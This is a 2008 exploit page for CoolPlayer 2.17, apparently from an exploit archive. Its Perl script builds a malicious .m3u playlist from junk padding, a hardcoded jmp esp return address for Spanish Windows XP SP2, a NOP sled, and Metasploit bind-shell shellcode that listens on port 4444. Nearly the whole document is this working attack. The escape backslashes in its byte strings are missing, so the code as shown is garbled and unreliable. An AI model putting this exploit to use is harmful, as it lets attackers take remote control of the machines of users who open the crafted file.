CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit
# Published : 2008-01-05
# Author : Trancek
# Previous Title : Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit
# Next Title : Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

#######################################################################
#
# CoolPlayer, Latest Build: 217
# Web:: http://coolplayer.sourceforge.net/
# Playlist(.m3u) File Local Buffer Overflow Exploit
#
# Vuln: http://www.securityfocus.com/bid/21396
#
#
# Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Adem??s del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
# Exploit by: Trancek
# Email:trancek@yashira.org
#
# Note: The .m3u file must be load in the player from the dir that was generated.
#          and If the dir is the root directory as C:/ or F:/ , you must add AAA to junk
#
#######################################################################
use Cwd;

print "CoolPlayer 2.17 .m3u Exploitnn";


$dir = getcwd()."/";
$lon = length($dir);
$a = 260 - $lon;
$junk = 'A' x $a;
$ret = "xEDx1Ex95x7C"; #jmp esp en ntdll.dll,win xp sp2(spanish)


# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x22".
"x5fx3cxf7x83xebxfcxe2xf4xdex35xd7xbaxcaxa6xc3x08".
"xddx3fxb7x9bx06x7bxb7xb2x1exd4x40xf2x5ax5exd3x7c".
"x6dx47xb7xa8x02x5exd7xbexa9x6bxb7xf6xccx6exfcx6e".
"x8exdbxfcx83x25x9exf6xfax23x9dxd7x03x19x0bx18xdf".
"x57xbaxb7xa8x06x5exd7x91xa9x53x77x7cx7dx43x3dx1c".
"x21x73xb7x7ex4ex7bx20x96xe1x6exe7x93xa9x1cx0cx7c".
"x62x53xb7x87x3exf2xb7xb7x2ax01x54x79x6cx51xd0xa7".
"xddx89x5axa4x44x37x0fxc5x4ax28x4fxc5x7dx0bxc3x27".
"x4ax94xd1x0bx19x0fxc3x21x7dxd6xd9x91xa3xb2x34xf5".
"x77x35x3ex08xf2x37xe5xfexd7xf2x6bx08xf4x0cx6fxa4".
"x71x0cx7fxa4x61x0cxc3x27x44x37x2dxabx44x0cxb5x16".
"xb7x37x98xedx52x98x6bx08xf4x35x2cxa6x77xa0xecx9f".
"x86xf2x12x1ex75xa0xeaxa4x77xa0xecx9fxc7x16xbaxbe".
"x75xa0xeaxa7x76x0bx69x08xf2xccx54x10x5bx99x45xa0".
"xddx89x69x08xf2x39x56x93x44x37x5fx9axabxbax56xa7".
"x7bx76xf0x7exc5x35x78x7exc0x6exfcx04x88xa1x7exda".
"xdcx1dx10x64xafx25x04x5cx89xf4x54x85xdcxecx2ax08".
"x57x1bxc3x21x79x08x6exa6x73x0ex56xf6x73x0ex69xa6".
"xddx8fx54x5axfbx5axf2xa4xddx89x56x08xddx68xc3x27".
"xa9x08xc0x74xe6x3bxc3x21x70xa0xecx9fxcdx91xdcx97".
"x71xa0xeax08xf2x5fx3cxf7";

$nopeando = "x90" x 20;


open(m3u, ">./vulnerable.m3u");
print m3u "$junk";
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";

# Post of exploit: http://www.p1mp4m.es/index.php?showtopic=58

# www.Syue.com [2008-01-05]